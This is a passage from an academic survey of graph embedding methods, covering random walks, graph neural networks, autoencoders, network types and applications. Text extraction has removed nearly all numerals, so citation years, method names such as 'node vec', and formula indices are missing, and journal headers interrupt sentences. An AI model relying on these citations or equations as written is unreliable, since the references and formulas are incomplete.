random walk with biasing parameters of bfs or dfs parameters. another way of sampling based on diffusion was presented in diff vec (rozemberczki & sarkar, ). by virtue of sampling being more centered around source nodes, it provides robust embeddings while being less flexible. walklets (perozzi, kulkarni & skiena, ) as a generalization of grarep (cao, lu & xu, ) use weighted combination of embeddings of powers of adjacency matrix a, a , …, ak to reduce the bias of deepwalk for low-order proximities, and approximates computing ai by skipping nodes using short random walks (perozzi et al., ). the focus on the local structure and non-convex optimization requiring the use of stochastic gradient descent and proper initialization limit random walk based methods in capturing the hierarchical structure of a graph. harp (chen et al., b) proposes a meta-strategy for graph embedding under recursive construction of nodes and edges into condensed graphs with similar global structure. these graphs are used as source initializations for embedding detailed graphs, resulting in the end in proper node and edge embeddings, which can be adopted for improving deepwalk (perozzi, al-rfou & skiena, ), line (tang et al., ), and node vec (grover & leskovec, ) algorithms. it was further generalized for community preserving using modularity maximization (tang & liu, ) and supporting large free-scale networks (feng et al., ). alternatively, struct vec (ribeiro, saverese & figueiredo, ) uses structural similarity without using node or edge attributes but considering graph hierarchy to measure similarity at different scales. liu et al. ( c) uses rooted substructures of a graph to preserve structural similarity. diffusion wavelet model to capture structural proximity was suggested in donnat et al. ( ). another approach to control hyper-parameters in random-walk methods is graph attention (abu-el-haija et al., ) learning multi-scale representation over adjacency matrix powers with the probabilistic approach for learning balancing weights for each power. it was further generalized to its deep learning analog in veličković et al. ( ) and liu et al. ( a), see also lee et al. ( ) for details on attention models on graphs. extension of deepwalk to heterogeneous networks was suggested in metapath vec (dong, chawla & swami, ). modifications of random-walk based methods using node attribute concepts and node proximities were suggested in genvector (yang, tang & cohen, b). with gemsec (rozemberczki et al., ), the authors extend sequence-based methods with additional k-means objective encouraging clustering structure-preserving in the embedding space and improving overall performance. discriminative deep random walk (ddrw) (li, zhu & zhang, ) was suggested for the task of attributed network classification. Çelikkanat & malliaros ( ) generalizes random walk based methods to the case of the exponential family of distributions for sampling strategies. sequence-based models, such as node vec, can obtain high-quality embeddings of structural input graph by sampling node sequences and learning context-consistent embeddings but are not able to capture additional node/edge features while being transductive by their nature. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ deep learning: graph convolutions complex non-regular graphs structure makes graph filtering not as simply defined as on images. in the past decades, researchers have been working on the graph signal processing methods including filtering, wavelets, fourier transformations using graph spectral domain. the studies on these methods can be found in shuman et al. ( ), ortega et al. ( a). advances in deep learning have led to a new field of studies devoted to applying neural networks to graph data (scarselli et al., ; li et al., a, b). recently, sdne (wang, cui & zhu, ) and dngr (cao, lu & xu, ) use deep autoencoder to capture non-linearity in graphs and simultaneously apply dimension reduction for constructing graph embedding. sdne use autoencoder preserving first order proximity and laplacian eigenmaps for penalizing long distances for embedding vectors of similar vertices. dgnr uses stacked denoising autoencoders over positive pointwise mutual information matrix obtained from similarity information based on random surfing. both methods use global information and thus are not appropriate for large networks. kipf & welling ( a) propose graph convolutional layer that offers a further simplified approximation to spectral convolution and achieves better computational efficiency for semi-supervised multi-class node classification is applicable for the other machine learning tasks. a model of several such convolutions is referred to as graph convolutional network (gcn). improvements over speed and optimization methods of training gcns were suggested in chen, zhu & song ( ), chen, ma & xiao ( ). stochastic approaches for network embedding optimization were briefly over-viewed in lei, shi & niu ( ). assume the graph g(v,e), adjacency matrix a and feature matrix x of size (nnodes, nfeatures), where nnodes refers to number of vertices and nfeatures to number of node attributes. then, gcn can be defined as set of hidden layers hi = σ(ahi− wi− ) where h is equal to matrix x, wi is learnable weight matrix. at the next hidden layer, these features are aggregated using the same propagation rule. it means that graph convolutions aggregate feature information of its neighbors based on the adjacency matrix. the idea of graph convolutions using spatial convolutions (operating with adjacency matrix) or spectral graph methods (operating with graph laplacian) was proposed in bruna et al. ( ), duvenaud et al. ( ), henaff, bruna & lecun ( ), niepert, ahmed & kutzkov ( ), defferrard, bresson & vandergheynst ( ), levie et al. ( ), while extending the gcn idea to recurrent models li et al. ( c), monti, bronstein & bresson ( ), mixture models of cnns monti et al. ( ); fey et al. ( ), diffusion convolutions atwood & towsley ( ); li et al. ( c), and models suitable for dynamic graphs under inductive learning paradigm natarajan & dhillon ( ); hamilton, ying & leskovec ( a). all the methods suggest semi-supervised embedding, however, choosing unique labels for each vertex one may obtain an unsupervised version of network embedding. the graphsaint (zeng et al., ) provides a solution for scalability problem in training graph neural networks. it compares different topology-based sampling algorithms makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (node, edge and random walks) in terms of bias and variance of learned gcn model. it also introduces unbiased estimator for node aggregation. another idea is to use deep autoencoders to learn compressed representations that capture the essence of the graph structure. an autoencoder includes two nonlinear functions, an encoder and a decoder, and attempts to minimize reconstruction loss. one such model specifically designed for graphs is gae, which consists of a gcn encoder (one or two stacked gcn layers in most use cases) that produces embeddings and an inner product decoder that reconstructs the adjacency matrix (â ¼ rðuutÞ, where σ is non-linearity like sigmoid function and u is embedding matrix of nodes). the weights of the model are trained by backpropagating the reconstruction loss, which is usually mean squared error (mse). vgae (kipf & welling, b) is a probabilistic counterpart of gae. it introduces a distribution over latent variables z, with these variables being conditionally independent gaussians given a and x with means (μ) and diagonal covariances (σ) being parameterized by two gcn encoders (kingma & welling, ). as in the case of images, vgae just adds kl-divergence term between conditional distribution q(z|x,a) and unconditional p(z) ∼ n( , ) to the loss. after node embeddings are reconstructed via random normal distribution sampling, that is, z = μ + σε. then adjacency matrix is decoded using inner product of achieved vector z as in simple gae. in very recent work, authors of graphsage (hamilton, ying & leskovec, a) offer an extension of gcn for inductive unsupervised representation learning and offer to use trainable aggregation functions instead of simple convolutions applied to neighborhoods in gcn. graphsage learns aggregation functions for a different number of hops that are applied to sampled neighborhoods of different depths, which then are used for obtaining node representations from initial node features. pinsage (ying et al., a) extends the previous algorithm with the importance sampling based on random walks. importance score is calculated simply as visit counts. it provides better scalability and quality. gat (veličković et al., ) use masked self-attention layers for learning weights balancing impact of neighbors on node embedding, and supporting both, inductive and transductive learning settings. in liu et al. ( a), authors suggested specific layers controlling the aggregation of the local neighborhood over bfs and dfs sampling, thus generalizing node vec (grover & leskovec, ) model to graph neural networks. similar to gcn, gat contains several hidden layers hi = f(hi − , a), where h is a graph node features. in each hidden layer linear transformation of input is firstly calculated with the learnable matrix w. the authors replace the adjacency matrix by learnable self-attention in form of a fully-connected layer with activation and further normalization with softmax. generalization of gated recurrent graph neural networks (li et al., c) was suggested in message passing neural network (mpnn) (gilmer et al., ) providing a differentiable way to combine information from neighbours. nowadays, many advanced deep neural network models are adapted to graph data. graph generative adversarial networks were suggested in ding, tang & zhang ( ) and yu et al. ( ). in you et al. ( ), recurrent graph neural network was suggested for the task of graphs generation. pooling operators for graphs were used in makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ defferrard, bresson & vandergheynst ( ), ying et al. ( b). yuan & ji ( ) modernize classic pooling to account graph structure using conditional random fields. adversarially regularized variational graph autoencoder (arvga) was suggested in pan et al. ( ). zhu et al. ( a) develop the dggan model that jointly learns source and target vectors for the directed graphs employing adversarial techniques. liu ( ) builds anonymized gcn with adversarial training to be robust to the noise attacks. hettige et al. ( ) propose the rase model, that applies gaussian denoising attribute autoencoder for achieving robustness of received embedding, while laakom et al. ( ) catches the uncertainty by learning probability gaussian distributions over embedding space. weng, zhang & dou ( ) employs adversarial training for variational graph autoencoder. zhu et al. ( b) use node feature smoothing for learn better embeddings. jing et al. ( ) designs variable heat kernel to learn robust representations. deep learning models are now a study of vulnerability to adversarial attacks, in particular, it relates to structural data. the first approaches for detection of node/edge add/remove mechanisms were studied in bojcheski & günnemann ( ), chen et al. ( c), while other researchers focused on methods for unsupervised (sun et al., b), semi-supervised (chen et al., e) and supervised (zügner, akbarnejad & günnemann, ) scenarios of graph embedding construction, and application for ml problems. the black-box approach was formulated in dai et al. ( ) and further covered in general overview for the problem of graph data poisoning (chen et al., b) and its applications to social media data (zhou et al., ) and knowledge graphs (zhang et al., b). a survey of methods for defense from adversarial attacks on graphs was suggested in sun et al. ( a). the deep learning models propose a new way of approximation for classic graph convolutions and kernels, which allows extracting embeddings faster. a mixture of it with semi-supervised techniques gives the state-of-the-art results in terms of scalability, speed and quality on downstream tasks. hyperbolic (non-euclidean) embeddings the euclidean space is not the best for structures like graphs, because has the low descriptive ability for hierarchical and scale-free structures. so, researchers have considered other space, that can successfully represent it in a comparatively low number of dimensions, saving the basic properties like angles. it allows using classical machine learning methods in down-streamed tasks. in certain cases, embedding into non-euclidean spaces may be beneficial for model performance (kleinberg, ; shavitt & tankel, ; krioukov et al., ). les were also used for constructing embedding in hyperbolic space (alanis-lobato, mier & andrade- navarro, ). deep learning approach was applied for hyperbolic embedding in chamberlain, clough & deisenroth ( ). there is no exact research on the properties of embedding spaces, but researchers mostly pay attention to preserving low dimensional space, catching graph properties and model quality trade-off. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ specific embeddings based on network types in this section, we show specific embedding models generalizing core methods of network representation to a certain domain of networks and applications based on the network type. attributed networks real-world networks are often accompanied with additional features for nodes and edges, such as labels, texts, images. these attributes tend to be correlated for close graph structures and could affect network embedding by adding additional information for the similarity of nodes. the attributes are usually represented by high-dimensional vectors of features (which are sparse for just label attributes). once the attributes are represented by their embeddings, the task is to incorporate them in network embedding model (under unsupervised or semi-supervised framework). the authors of tadw (yang et al., ) represent deepwalk model as matrix factorization and incorporate text attributes into factorization framework. ple (ren et al., ) jointly learns the representations of entity types and links together with text features. in le & lauw ( ), a generative model for document network embedding was suggested based on topic modeling of documents using relational topic model (rtm) (chang & blei, ) and the relationships between the documents. in ganguly et al. ( ), authors combine text and network features for co-authorship recommendations. augmented relation embedding (are) (lin, liu & chen, ) adds content-based features for images using graph-laplacian spectral embedding modification. in geng et al. ( ), zhang et al. ( , ), authors suggested to embed images, textual and network information for modeling user-image interaction. in addition to structural similarity, in certain cases feature similarity may be also important. two-layered network embedding for node-to-node and text-to-text similarities was suggested in sun et al. ( ). in zhang et al. ( b), the authors proposed the hsca model, embedding homophily, network topological structure and node features simultaneously. in deepbrowse (chen, anantharam & skiena, ), the authors suggested using deepwalk-based node similarity together with priority ranking for recommender system based on an interaction graph. label preserving attribute node embedding was suggested in tri-party deep network representation (pan et al., ). modifications of random-walk based methods using node attribute concepts and node proximities were suggested in genvector (yang, tang & cohen, b). label attributes are also an important part for such problems as classification of nodes and edges, or community information (assigning each node a community label). community preserving network embeddings were suggested in shaw & jebara ( ), wang et al. ( d) and rozemberczki et al. ( ). incorporating group information was presented in gene model (chen, zhang & huang, b) under a supervised framework. semi-supervised frameworks for learning network embedding under loss constraints for labeled data were suggested in planetoid (yang, cohen & salakhutdinov, a) max-margin deep walk (tu et al., ) and lane (huang, li & hu, ). makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ heterogeneous networks a heterogeneous network presents a different concept of graph representation, in which nodes and edges may have different types (or even multiple edges). the heterogeneous network embeddings either learn embeddings in the same vector space (li, ritter & jurafsky, ; zhao, liu & sun, ), or construct the embeddings separately for each modality and then aggregate them into one space, such as hne model (chang et al., ) and tang & liu ( ), or even aggregate over multiple network layers (xu et al., ) or different relation features (huang, li & hu, ). random-walk based approach for different node types based on deepwalk was presented in metapath vec (dong, chawla & swami, ). similar approaches based on meta-path random walks for graph embedding were suggested in huang & mamoulis ( ), chen & sun ( ). jacob, denoyer & gallinari ( ) use heterogeneous network embedding for node classification across different node types. a similar problem was posed for author identification on double-blind review scenario (chen & sun, ). study by jiang et al. ( ) provides a framework for efficient task-oriented skip-gram based embeddings. hu, fang & shi ( ) utilizes the generative adversarial networks, which learn node distributions for efficient negative sampling. shi et al. ( ) proposes a method for automatic meta-path construction. cao et al. ( ) use the graph attention mechanism for heterogeneous graph embedding task. magnn architecture (fu et al., ) extends simple attention mechanism with several levels: node attributes, inter meta-path information and intra meta-path semantic information. dyhan (yang et al., ) presents the model for dynamic heterogeneous graphs with hierarchical attention. another way to use the attention mechanism in dynamic heterogeneous networks is the li et al. ( b). it employs three types of attention: structural, semantic and temporal. heterogeneous graph embeddings are widely used in real-world applications. hong et al. ( ) estimates the arrival time for transportation networks, ragesh et al. ( ) use it in text classification. chen & zhang ( ), li et al. ( a) utilizes hin embedding for multi-modal data fusion task. zhang et al. ( a) preserves the relationships in hin. a survey on heterogeneous networks can be found in wang et al. ( a). signed networks in a signed network, each edge is associated with its weight, taking values from the set { , − }, which usually represents belief or opinion sentiment for different relations types. these networks are specifically considered apart from heterogeneous networks as important objects for social network analysis, although they are still just a specific type of such networks. one of the tasks on such networks is predicting links and their signs (liu et al., a). sine (wang et al., c) is a dnn model aiming at close relationships with friends (positive weight) rather than with foes (negative weight). for highly positive social networks a virtual node with negative relation is proposed to use in the model, which uses pairwise similarities optimization under constraint mentioned above. in yuan, wu & xiang ( ), the authors propose a local neighborhood aggregation model sne for each makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ type of positive and negative relations. kim et al. ( ) propose random-walks based model side for signed directed networks. also, they provide socio-psychological interpretation for each term in the loss function. signet (islam, prakash & ramakrishnan, ) develops new target node sampling for more efficient learning. in oppose to previous works, lu et al. ( ) provides signed network embedding powered by status theory (leskovec, huttenlocher & kleinberg, ). it natively works with directed networks by preserving node ranking except direct node similarity. multi-layer networks multi-layer networks are used to model complex systems with different levels of interaction between nodes, for example, whole airline network with different carriers. each layer in such networks corresponds to different types of relationships. liu et al. ( a) compare three aggregation methods for single-layer network embedding models: merging of different layers in one network, single-layer vectors concatenation and between-layer random walks. the best results show the last method named layer co-analysis because it allows learning between-layer interactions. in xu et al. ( ) authors provide an example of coupling into joint space two separately learned heterogeneous networks embeddings. ione (liu et al., ) preserves users similarity based on their followers and followees for several social networks. a hierarchy-aware unsupervised node feature learning approach for multi-layer networks was proposed in zitnik & leskovec ( ). in li et al. ( ) authors develop the single optimization framework for both within-layer and between-layer communication. it exploits spectral embedding and the block model. temporal networks a lot of real-world networks are evolving over-time. most of the described above methods concentrate on the static embeddings, so it works poorly in the temporal scenario. haddad et al. ( ) propose the adaptation of node vec model to the dynamic case. authors also introduce the task-specific temporal embeddings. rossi et al. ( a) provide the generic framework named temporal graph networks for deep learning on dynamic graphs. fathy & li ( ) apply the graph attention to the temporal networks. zhong, qiu & shi ( ) develop the model for efficient community mining. rokka chhetri & al faruque ( ) present the model for dynamic physics graphs. ctgcn model (liu et al., a) generalizes graph convolution networks with feature transformation and aggregation. it builds the hierarchical representation of the graph with k-cores and applies gcn to it. goyal, chhetri & canedo ( ) use the recurrent neural networks to catch the dynamics. there is one more specific graph type: temporal interaction networks, such as user-item interactions in the recommender systems. zhang et al. ( b) creates the embedding approach for such graph utilizing coupled memory networks. nowadays, methods based on smart neighborhood aggregation, such as limiting random walks over clusters chiang et al. ( ) and precomputing diffusion-based neighborhoods for one-layer gcn rossi et al. ( b) show great performance over existing approaches, thus combining advances in deep learning and neighborhood sampling methodology. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ large graphs we have already mentioned that random walks and graph neural networks were proposed as the approximations for the different classic matrix factorization techniques. so in this section, we will discuss approaches to scale up gnn training. the basic idea implemented in different papers is a sampling. graphsage (hamilton, ying & leskovec, a) learns trainable aggregations for sampled node neighbourhood. this approach was further improved with fixed-length random walk based importance sampling of the neighborhood in ying et al. ( a). graphsage also provides the idea of minibatch training for gnns. a similar idea was proposed in the chen, ma & xiao ( ). salha, hennequin & vazirgiannis ( ) propose to use linear aggregation over direct neighbors to simplify computations. the graphsaint (zeng et al., ) compares different topology-based sampling algorithms (node, edge and random walks) in terms of bias and variance of learned gcn model. it also introduces unbiased estimator for aggregation of node and normalizes propagation by this value, that solves the scalability problem. nie, zhu & li ( ) is based on the idea of locality preserving projection. it works with anchor-based proximity matrices and calculates these anchors via balanced and hierarchical k-means. such an approach allow to reduce complexity from n d to ndm where n is a number of samples, d is embedding dimension and m is a number of anchors. akyildiz, aljundi & kaya ( ) extends the verse (tsitsulin et al., ) with graph partitioning and coarsening to provide fast embedding computation on the gpu. atahan akyildiz, alabsi aljundi & kaya ( ) analyzes effects of graph coarsening on different embeddings in comparison to gosh. another distributed training framework was presented in zheng et al. ( a). it also provides efficient graph partitioning schemes for reducing between-machine communication. gallicchio & micheli ( ) keeps the graph embedding as the dynamical systems and study the embedding stability issue. authors found that stable initialization allows to left weights untrained in deep sparse networks. lu & chang ( ) use softmax clustering for modularity maximization. they show that such a method is a linear approximation for main eigenvectors. application of graph embeddings to machine learning problems here, we aim to overview core machine learning problems involving structural data. we start with problems related to small graph motifs such as nodes and edges, while further going to the problems connected to subgraphs and graphs as a whole. node classification definition (node classification) for a given graph g(v, e) with known labels for some of nodes from v, node classification is the task of predicting missing labels for existing or newly added nodes. node classification deals with assigning class labels to nodes based on labeled nodes data (zhu et al., ; bhagat, cormode & muthukrishnan, ). the structural information is used in a context that “similar” nodes should have the same/similar labels. the original makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ framework uses label propagation based on random walks statistics (xiaojin & zoubin, ; azran, ; baluja et al., ). in an unsupervised framework, each node is embedded in a low-dimensional space following by training a classifier on the set of labeled node embedding vectors (lu & getoor, ; bhagat, cormode & rozenbaum, ). authors use such machine learning models as logistic regression (perozzi, al-rfou & skiena, ; pimentel, veloso & ziviani, ), svm (wang, cui & zhu, ; wang et al., d), knn (le & lauw, ; wilson et al., ), random forest and xgboost (makarov et al., ; makarov et al., c); the choice is usually made based on the size of training data, interpretability of features and embedding dimension. in semi-supervised framework, node embeddings are learned via loss function containing regularization for labeled data predictions, penalizing “similar” nodes to have different labels (li, zhu & zhang, ; yang, cohen & salakhutdinov, a; tu et al., ; kipf & welling, a; monti et al., ). zhang, zhou & li ( ) proposes hierarchical gcn and pseudo-labeling technique for learning in scarce of annotated data. liu et al. ( b) proposes a sampling strategy and model compression for handling sparsity of labels. chen et al. ( ) employs contrastive learning techniques to achieve semi-supervised parametrized fusion of graph topology and content information. zhu et al. ( c) also use metric learning approach but applies it to corrupted graph substructures. nozza, fersini & messina ( ) use two-phase optimization for attributed graph embedding. shi, tang & zhu ( ) aligns topology of attribute content network to the corresponding graph to simultaneously learn good embeddings. wang et al. ( b) propose two models for the imbalanced scenarios. a survey on classic techniques for node classification can be found in bhagat, cormode & muthukrishnan ( ). link prediction definition (link prediction problem (lpp)) is a task of completing missing edges in noisy graphs or predicting new edges in temporal network structures. formally, lpp for given graph g(v, e) with adjacency matrix a is a task of learning such function f that reconstruct or predict next adjacency matrix a based on different graph features such as metrics (e.g., jaccard, adamic-adar), graph embeddings. network science approach to the problem of predicting collaborations results in the link prediction (lp) problem (liben-nowell & kleinberg, ) for temporal networks and missing edges reconstruction in noisy network data. basically, it is a method to apply standard machine learning framework for graph data considering feature space consisting of pairs of nodes and their features. one of the interesting research questions is in the way of constructing edge embedding in a non-direct combination of node embeddings, as it was suggested in component-wise embeddings (grover & leskovec, ) or bi-linear combination of compressed node embeddings suggested in abu-el-haija, perozzi & al-rfou ( ). certain practical applications for drug combinations was suggested in zitnik, agrawal & leskovec ( ). harp chen et al. ( b) incorporates several hierarchical layers while transmitting information from edge embedding to node embedding. other systems of directly makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ incorporating edge features and labels were suggested in cane (tu et al., ) and lane (huang, li & hu, ). models of joint node and edge structure learning were proposed in dual-primal gcn (monti et al., ) and elaine (goyal et al., ). a model for embedding event graphs in which event is described by several edges was presented in hebe (gui et al., ). wu et al. ( ) presents random walk with restart index. phuc, yamada & kashima ( ) embeds several graphs with similar structural properties to boost link prediction accuracy. keser et al. ( ) employs skip-connections in vgae. link prediction models are applied in web linking (adafre & de rijke, ), social dating services (backstrom & leskovec, ) and paper recommender system for digital libraries (he et al., ). the reader can found an up-to-date survey in srinivas & mitra ( ). lpp was specifically formulated in liben-nowell & kleinberg ( ) based on nodes pairwise similarity measures. approaches for link prediction include similarity based methods (adamic & adar ( )), maximum likelihood models (clauset, moore & newman, ), and probabilistic models (getoor & taskar, ; heckerman, meek & koller, ). in tang & liu ( ), authors are suggesting unsupervised approach for lp problem. gao, denoyer & gallinari ( ), gao et al. ( ) suggested temporal link prediction based on matrix factorization technique and noise reduction in large networks. attribute-based link formation in social networks was studied in mcpherson, smith-lovin & cook ( ), robins et al. ( ), while deep learning approaches were presented in liu et al. ( ), zhai & zhang ( ) and berg, kipf & welling ( ). heterogeneous graph link prediction for predicting links of certain semantic type was suggested in liu et al. ( b, b). an evaluation of link prediction models based on graph embeddings for biological data was presented in crichton et al. ( ). two surveys on link prediction methods describing core approaches for feature engineering, that is, bayesian approach and dimensionality reduction were presented in hasan & zaki ( ) and lü & zhou ( ). survey on link prediction was published in wang et al. ( ). node clustering definition (node clustering or community detection or graph partitioning) is the task of the partitioning of a graph g(v, e) into several subgraphs gi(vi, ei) with a dense connection within groups and sparse connection between clusters. node clustering (also known as community detection in social network analysis) aims to find such a grouping (labelling) of nodes so that nodes in the same group are closer to each other rather than to the nodes from outside of the group (malliaros & vazirgiannis, ). no labels are provided on initial step due to unsupervised type of the problem. methods use attribute (zhou, cheng & yu, ) or structural information. the latter methods of graph clustering are usually based on either community detection (newman & girvan, ; fortunato, ) or structural equivalence (xu et al., ). in community detection (shi & malik, ; ding et al., ), the cluster is defined as makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dense subgraph with a high number of edges inside subgraph, and a low number of edges between subgraph and the rest of a graph. the general idea is to use node embeddings as a compressed representation of sparse graph adjacency matrix and then apply standard clustering algorithms, such as k-means or dbscan, for vectorized data (white & smyth, ; tian et al., ; cao, lu & xu, ; chen et al., b; cao, lu & xu, ; nie, zhu & li, ). going further, joint optimization of clustering and node embedding was suggested in tang, nie & jain ( ), wei et al. ( ). efficient iterative community aware network embedding was proposed in wang et al. ( d) and several others (zheng et al., ; cavallari et al., ). teng & liu ( ) propose multi-objective evolutionary algorithm for community detection. zhang, shang & jiao ( ) use multi-objective matrix factorization over several shortest path graphs and utilizes (moea) to find community structure. salim, shiju & sumitra ( ) train the embeddings on different views for preserving many properties of a given network. quiring & vassilevski ( ) employs hierarchical coarsening of the graph to better extract clusters. subgraph (and graph) embedding while studying network embedding, one may think of a way to aggregate or generalize low-level node feature representation to the whole network representation, thus stating the problem of embedding the whole graph (song, ). such vector is required for the graph-level tasks like graph classification, similarity and clustering. it considers the whole network as one structural unit in the training dataset. the task is relevant to chemistry or biology domains (nikolentzos, meladianos & vazirgiannis, ; zhang et al., a; duvenaud et al., ; dai, dai & song, ; niepert, ahmed & kutzkov, ; kearnes et al., ). they can also be applied for graph reasoning (li et al., c) or computer vision tasks (bruna et al., ). in duvenaud et al. ( ), the sum based approach over network embedding was suggested. following by it, in dai, dai & song ( ), authors proposed neural network aggregation for constructing network embedding which is an argument for summing over subgraph nodes. improvement of these methods was later suggested in bronstein et al. ( ) based on approximations of spectral graph decompositions. ordered-based (niepert, ahmed & kutzkov, ) and fuzzy-based (kearnes et al., ) approaches based on aggregating features from convolutional approaches further improved subgraph embedding models. sun, hoffmann & tang ( ) maximize the mutual information between embedding and different graph substructures. the general approach of gilmer et al. ( ) as well as other convolutional approaches can be generalized by pooling-aggregation models or, as was suggested in scarselli et al. ( ), by adding super-node for whole graph embedding. the attention mechanism was applied to the graph classification task (lee, rossi & kong, ). definition (line (dual) graph) for a graph g = (v, e) defined as a set of vertices v and a set of edges e � v � v without loops and multi-edges we denote by g* = (v*, e*) a dual (line) graph the nodes of which are the edges of g and edges are nodes, in the makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sense that two adjacent nodes are connected by an edge if corresponding edges have a common node incident to them. in graph-level tasks, specific network properties play a major role. so vectors reconstructing sophisticated similarity metrics closely related to the problem of graph isomorphism was studied in several works (shervashidze et al., ; niepert, ahmed & kutzkov, ; mousavi et al., ; yanardag & vishwanathan, ; narayanan et al., ). gl vec (chen & koga, ) extends narayanan et al. ( ) model with edge features by utilizing the line graph. the works on matching node embedding and graph kernels were suggested in johansson & dubhashi ( ), nikolentzos, meladianos & vazirgiannis ( ). in donnat & holmes ( ) authors analyze graph-based distance methods for a temporal graph of bio-medical surveys. hierarchical clustering and fusion of different network representations were overviewed in yang & wang ( ). usually, this kind tasks require fusion of different similarity representations of a network as different graphs (serra, greco & tagliaferri, ; xue et al., ), preserving graph structure (hou et al., ) or simultaneously performing semi-supervised classification and clustering with adaptive knn model (nie, cai & li, ). different domain network clustering was suggested in cheng et al. ( ) and improved in the following works suggesting fusion of different not-synchronized networks with different structures (ni et al., ), cross-domain associations (liu et al., b) or multi-view spectral clustering (li et al., b). khasahmadi et al. ( ) propose a memory layer for graphs, that can efficiently learn graph hierarchical representations. tsitsulin, munkhoeva & perozzi ( ) propose an algorithm for efficient calculation of spectral distances for large graphs. kolouri et al. ( ) suggest the embedding preserving wasserstein distance with linear complexity. qin et al. ( ) presents one more graph pooling technique that uniformly aggregates neighborhood. baldini, martino & rizzi ( ) embeds maximal cliques to preserve structural similarities between graphs. yan & wang ( ) states the problem of transfer learning suggesting the framework for graph alignment and further adaptation learning for gnns. network visualization definition (graph visualization) is a way to map a graph to a low ( d, d) dimensional space. all nodes are either directly embedded as d vectors (le & lauw, ; wang, cui & zhu, ; cao, lu & xu, ; tu et al., ; niepert, ahmed & kutzkov, ; pan et al., ) or first embedded to certain dimension, and then compressed via pca (herman, melançon & marshall, ) or t-sne (maaten & hinton, ) (or other dimension reduction frameworks, see for, for example, tenenbaum, de silva & langford, , de oliveira & levkowitz, ) in order to plot in d space. if there are labels or communities representative for network dataset, the nodes are usually visualized with different colors for each label in order to verify whether similar nodes are embedded closer to each other. such models, as perozzi, al-rfou & skiena ( ), grover & leskovec ( ), tang et al. ( ), ou et al. ( ), wang, cui & zhu ( ) demonstrated proper makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performance on the task of network visualization for unsupervised graph embedding models. evaluation of graph embeddings for large structural data visualization can be found in tang et al. ( a). graph visualization techniques beyond planar mappings can be found in didimo, liotta & montecchiani ( ). network compression definition (network compression, simplification or sparsification) is a task of reducing the number of nodes and edges in a graph, for further efficient application of graph algorithms. the concept of network compression was first introduced in as feder & motwani ( ) under the idea of reducing the number of stored graph edges while achieving a faster performance of certain algorithms on graphs. the compression was made by grouping nodes and edges into partitions of bipartite cliques and then replacing these cliques with trees. similar ideas of dividing the graph into groups of nodes and edges and encoding them were proposed in several studies (pardalos & xue, ; tian, hankins & patel, ; toivonen et al., ). minimum description length (mdl) (rissanen, ) was used in navlakha, rastogi & shrivastava ( ) to construct graph summary adjusted with edge correction algorithm. graph embeddings support compact graph representation, reducing memory storage from o(|v| × |v|) to o(d × |v|), where embedding dimension d � n below was shown to be enough for qualitative network reconstruction for second-order preserving proximity models (e.g., link prediction), such as ou et al. ( ) and wang, cui & zhu ( ). they also suit for various graph optimization task providing useful tools for constructing graph-based heuristics (khalil et al., ). applications to real-world problems in this section, we are interested in how graph embeddings appear in many other computer science fields, in which graphs are not directly expressed in the data, but relations between the objects can be efficiently described by graphs, and so, graph embeddings. computer vision image classification can be solved with classic cnn models considering the images as a grid-like structure. recently, graph convolutional network models can take into account different neighboring relations, thus going beyond the nearest pixels as the only features for convolutions. especially interesting results were obtained for d shape reconstruction (monti et al., ) and video action recognition. there are four main ideas of using graph neural networks for computer vision tasks: working with the interaction of objects on video and images, feature similarity graph, label graph, that is, images with the same label are connected, and internal graph-structured image data. one of the main problems with cnn is that they should be deep enough to account interaction information between object, so chen et al. ( c) propose glore unit that applies gcns over interaction data. it helps to efficiently solve relational reasoning task. in makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wang et al. ( ) relation graph of image objects was built for localizing object instance from natural language expression. graph representation is also useful for representing in-label object interaction like in metric learning. it successfully applied to face clustering task (yang et al., ; wang et al., b). also such graph was exploited by kim et al. ( ) for few-shot learning classification. graph convolutions are widely used in skeleton-based action recognition. it applies different graph network models to human skeleton graph (shi et al., ; si et al., ; li et al., a). gnns are used for video tracking and classification tasks (zhang et al., a; gao, zhang & xu, ; zhong et al., ). natural language processing nlp is highly correlated to graph tasks. here similar sequential methods are used, while data have hierarchical structure from different views. in marcheggiani & titov ( ), authors assign semantic roles by encoding sentences with the graph convolutional network. in marcheggiani, bastings & titov ( ), zhao et al. ( ) graph convolutional network models were applied for machine translation. sevgili, panchenko & biemann ( ) use the wikipedia link graph between entities to improve the quality of entity disambiguation task on unstructured text data. graph models are widely used in nlp to extract syntactic and semantic information (luo et al., ; vashishth et al., ; veyseh, nguyen & dou, ). the main approach is to extract the dependency graph and learn node (word) embeddings using gcn. another approach is to examine each sentence as a complete graph with adjacency weighted by attention. graph neural networks also help in sequence tagging task, because it natively exploits information about the connection between different entities. zhu et al. ( ) propose the generated parameters gnn for the relation extraction task. it also builds a complete graph of entities in the sentence via encoding of the sentence with any sequence model. after that, gnn is applied to solve the node classification task. a prominent application of gnns is to encode dependency tree information. such an approach is exploited by guo, zhang & lu ( ), they apply graph attention models. sahu et al. ( ) also use dependency graph for relation extraction 